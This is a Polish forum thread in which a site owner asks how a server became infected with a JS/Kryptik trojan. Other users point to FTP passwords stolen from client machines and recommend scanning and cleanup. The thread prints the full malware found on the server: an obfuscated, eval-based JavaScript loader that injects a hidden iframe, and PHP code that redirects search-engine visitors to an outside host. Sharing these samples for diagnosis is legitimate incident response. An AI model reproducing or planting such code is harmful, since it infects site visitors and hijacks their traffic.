Jak serwer może się zaraziś trojanem? [KOD] Opcje

[Beacri]

Witam,
na serwerze znalazłem podejżany kod, który okazał się trojanem JS/Kryptik. Co ciekawe występuje on tylko w plikach .js na jednej z 4 stron magazynowanych na serwerze. Wszystkei stronki to CMSy pisane na zlecenie. Macie jakiś pomysł jak mogło dojść do infekcji?

Dla zainteresowanych daję kod:

Kod

/*74ed9f*/
                                                                                                                                                                                                                                                          z="y";vz="d"+"oc"+"ument";ps="s"+"plit";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="^";}z="2d^73^82^7b^70^81^76^7c^7b^2d^6e^7f^82^84^3d^46^35^36^2d^88^1a^17^2d^83^6e^7
f^2d^80^81^6e^81^76^70^4a^34^6e^77^6e^85^34^48^1a^17^2d^83^6e^7f^2d^70^7c^7b^81^7
f^7c^79^79^72^7f^4a^34^76^7b^71^72^85^3b^7d^75^7d^34^48^1a^17^2d^83^6e^7f^2d^6e^7
f^82^84^2d^4a^2d^71^7c^70^82^7a^72^7b^81^3b^70^7f^72^6e^81^72^52^79^72^7a^72^7b^8
1^35^34^76^73^7f^6e^7a^72^34^36^48^1a^17^1a^17^2d^6e^7f^82^84^3b^80^7f^70^2d^4a^2
d^34^75^81^81^7d^47^3c^3c^79^6e^7b^71^80^81^7f^6e^81^72^74^76^72^80^3b^70^7c^3b^8
2^78^3c^7a^74^5b^46^78^44^53^66^3b^7d^75^7d^34^48^1a^17^2d^6e^7f^82^84^3b^80^81^8
6^79^72^3b^7d^7c^80^76^81^76^7c^7b^2d^4a^2d^34^6e^6f^80^7c^79^82^81^72^34^48^1a^1
7^2d^6e^7f^82^84^3b^80^81^86^79^72^3b^70^7c^79^7c^7f^2d^4a^2d^34^46^3e^46^3e^3e^3
4^48^1a^17^2d^6e^7f^82^84^3b^80^81^86^79^72^3b^75^72^76^74^75^81^2d^4a^2d^34^46^3
e^46^3e^3e^7d^85^34^48^1a^17^2d^6e^7f^82^84^3b^80^81^86^79^72^3b^84^76^71^81^75^2
d^4a^2d^34^46^3e^46^3e^3e^7d^85^34^48^1a^17^2d^6e^7f^82^84^3b^80^81^86^79^72^3b^7
9^72^73^81^2d^4a^2d^34^3e^3d^3d^3d^46^3e^46^3e^3e^34^48^1a^17^2d^6e^7f^82^84^3b^8
0^81^86^79^72^3b^81^7c^7d^2d^4a^2d^34^3e^3d^3d^3d^46^3e^46^3e^3e^34^48^1a^17^1a^1
7^2d^76^73^2d^35^2e^71^7c^70^82^7a^72^7b^81^3b^74^72^81^52^79^72^7a^72^7b^81^4f^8
6^56^71^35^34^6e^7f^82^84^34^36^36^2d^88^1a^17^2d^71^7c^70^82^7a^72^7b^81^3b^84^7
f^76^81^72^35^34^49^7d^2d^76^71^4a^69^34^6e^7f^82^84^69^34^2d^70^79^6e^80^80^4a^6
9^34^6e^7f^82^84^3d^46^69^34^2d^4b^49^3c^7d^4b^34^36^48^1a^17^2d^71^7c^70^82^7a^7
2^7b^81^3b^74^72^81^52^79^72^7a^72^7b^81^4f^86^56^71^35^34^6e^7f^82^84^34^36^3b^6
e^7d^7d^72^7b^71^50^75^76^79^71^35^6e^7f^82^84^36^48^1a^17^2d^8a^1a^17^8a^1a^17^7
3^82^7b^70^81^76^7c^7b^2d^60^72^81^50^7c^7c^78^76^72^35^70^7c^7c^78^76^72^5b^6e^7
a^72^39^70^7c^7c^78^76^72^63^6e^79^82^72^39^7b^51^6e^86^80^39^7d^6e^81^75^36^2d^8
8^1a^17^2d^83^6e^7f^2d^81^7c^71^6e^86^2d^4a^2d^7b^72^84^2d^51^6e^81^72^35^36^48^1
a^17^2d^83^6e^7f^2d^72^85^7d^76^7f^72^2d^4a^2d^7b^72^84^2d^51^6e^81^72^35^36^48^1
a^17^2d^76^73^2d^35^7b^51^6e^86^80^4a^4a^7b^82^79^79^2d^89^89^2d^7b^51^6e^86^80^4
a^4a^3d^36^2d^7b^51^6e^86^80^4a^3e^48^1a^17^2d^72^85^7d^76^7f^72^3b^80^72^81^61^7
6^7a^72^35^81^7c^71^6e^86^3b^74^72^81^61^76^7a^72^35^36^2d^38^2d^40^43^3d^3d^3d^3
d^3d^37^3f^41^37^7b^51^6e^86^80^36^48^1a^17^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7
c^78^76^72^2d^4a^2d^70^7c^7c^78^76^72^5b^6e^7a^72^38^2f^4a^2f^38^72^80^70^6e^7d^7
2^35^70^7c^7c^78^76^72^63^6e^79^82^72^36^1a^17^2d^38^2d^2f^48^72^85^7d^76^7f^72^8
0^4a^2f^2d^38^2d^72^85^7d^76^7f^72^3b^81^7c^54^5a^61^60^81^7f^76^7b^74^35^36^2d^3
8^2d^35^35^7d^6e^81^75^36^2d^4c^2d^2f^48^2d^7d^6e^81^75^4a^2f^2d^38^2d^7d^6e^81^7
5^2d^47^2d^2f^2f^36^48^1a^17^8a^1a^17^73^82^7b^70^81^76^7c^7b^2d^54^72^81^50^7c^7
c^78^76^72^35^2d^7b^6e^7a^72^2d^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^7f^81^2d^4
a^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^3b^76^7b^71^72^85^5c^73^35^2d^7
b^6e^7a^72^2d^38^2d^2f^4a^2f^2d^36^48^1a^17^2d^83^6e^7f^2d^79^72^7b^2d^4a^2d^80^8
1^6e^7f^81^2d^38^2d^7b^6e^7a^72^3b^79^72^7b^74^81^75^2d^38^2d^3e^48^1a^17^2d^76^7
3^2d^35^2d^35^2d^2e^80^81^6e^7f^81^2d^36^2d^33^33^1a^17^2d^35^2d^7b^6e^7a^72^2d^2
e^4a^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^3b^80^82^6f^80^81^7f^76^7b^7
4^35^2d^3d^39^2d^7b^6e^7a^72^3b^79^72^7b^74^81^75^2d^36^2d^36^2d^36^1a^17^2d^88^1
a^17^2d^7f^72^81^82^7f^7b^2d^7b^82^79^79^48^1a^17^2d^8a^1a^17^2d^76^73^2d^35^2d^8
0^81^6e^7f^81^2d^4a^4a^2d^3a^3e^2d^36^2d^7f^72^81^82^7f^7b^2d^7b^82^79^79^48^1a^1
7^2d^83^6e^7f^2d^72^7b^71^2d^4a^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^3
b^76^7b^71^72^85^5c^73^35^2d^2f^48^2f^39^2d^79^72^7b^2d^36^48^1a^17^2d^76^73^2d^3
5^2d^72^7b^71^2d^4a^4a^2d^3a^3e^2d^36^2d^72^7b^71^2d^4a^2d^71^7c^70^82^7a^72^7b^8
1^3b^70^7c^7c^78^76^72^3b^79^72^7b^74^81^75^48^1a^17^2d^7f^72^81^82^7f^7b^2d^82^7
b^72^80^70^6e^7d^72^35^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^3b^80^82^6
f^80^81^7f^76^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^7
6^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^3
6^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6
c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^3
4^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^3
4^36^48^1a^17^1a^17^6e^7f^82^84^3d^46^35^36^48^1a^17^8a^1a^17^8a"[ps](a2);za="";aa("arCode");e(""+za);}
/*/74ed9f*/

[Mega_88]

Login, Hasło itp wykradzione z klienta FTP, zmień hasło do FTP wgraj czystą stronę. Z tego co pamiętam wirus Kryptik również dodaje swój wpis w index.php sprawdź dokładnie.

[sowiq]

Poszukaj na forum, było o tym setki razy.

Kilka przykładów:
http://forum.php.pl/index.php?showtopic=90911
http://forum.php.pl/index.php?showtopic=87921
http://forum.php.pl/index.php?showtopic=40133
http://forum.php.pl/index.php?showtopic=133924
http://forum.php.pl/index.php?showtopic=120773

[Beacri]

Z hasłami już ok. Teraz tylko znajdywanie śmieci, bo nie ja pisałem CMSa więc nie ogarniam tego chaosu

Co sądzicie o kodzie schowanym pod eval(base64():

[PHP] pobierz, plaintext 
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"webalta") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"facebook.com/l") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") and !stristr($referer,"inurl") and !stristr($referer,"EeYp3D7")){
header("Location: <a href="http://trtlu.ddns.info/&quot%3b%29;" target="_blank">http://trtlu.ddns.info/");</a>
exit();
}
}
}
}
}
[PHP] pobierz, plaintext 

BTW: moje pytanie dotyczyło jak to świństwo się dostało tutaj

[Mega_88]

Odpowiedź masz w moim poście "Login, Hasło itp wykradzione z klienta FTP".

Nie pamiętam żeby Kryptik coś takiego wstawiał, ale sam kod i http://trtlu.ddns.info ... jak dla mnie to skasowania pod adres nie wchodziłem, ale niech ktoś bardziej obeznany Ci odpowie.

[extremeprogrammi...]

W sume sam adres to tylko przekierowanie na bing. Bez reszty kodu adresik nic nie robi. Włamanie na FTP jest mało pawdopodobne, bo do łatwych nie należy i w zasadzie są tylko dwie możliwości.

Ja proponuje Ci to samo co koledzy. Plus jeszcze jedną rzecz. Zanim wyślesz stronkę na serwer, przeskanuj to arachni i popraw błędy. Znaczy się stronę lokalnie przeskanuj arachni. U mnie jest tak, że na maszynie wirtualnej służącej tylko do testowania różnymi takimi dziwnymi narzędziami, skanuje to różnymi dziwnymi narzędziami w nocy, rano mam wyniki, potem poprawki i jazda na serwer. Moim zdaniem ktoś Ci podrzucił nowe pliczki.

Proponuje dodatkowo wejść na OWASP Top 10 i poczytać trochę o bezpieczeństwie.

Pozdrawiam i życzę powodzenia w usuwaniu buga.

[sowiq]

Włamanie na FTP jest mało pawdopodobne, bo do łatwych nie należy i w zasadzie są tylko dwie możliwości.

No właśnie nie do końca. Sam miałem jakiś czas temu przyjemność zabawy z takim trojanem.
To nie jest typowe włamanie tylko na kompie instaluje się jakiś syf, który wykrada hasła do FTP, później loguje się bez problemów i podmienia pliki. Szczególnie narażone były osoby korzystające z Total Commandera.

W moim przypadku operacje były bardzo sprytne. Np. pozakładał kilka nowych katalogów z plikami "images.php", do kilkunastu plików podoklejał kod (zarówno PHP jak i JS), a nawet zmienił prawa dostępu do katalogu i plików z cache Smarty, przez co nawet wrzucenie czystych plików początkowo nie przyniosło poprawy.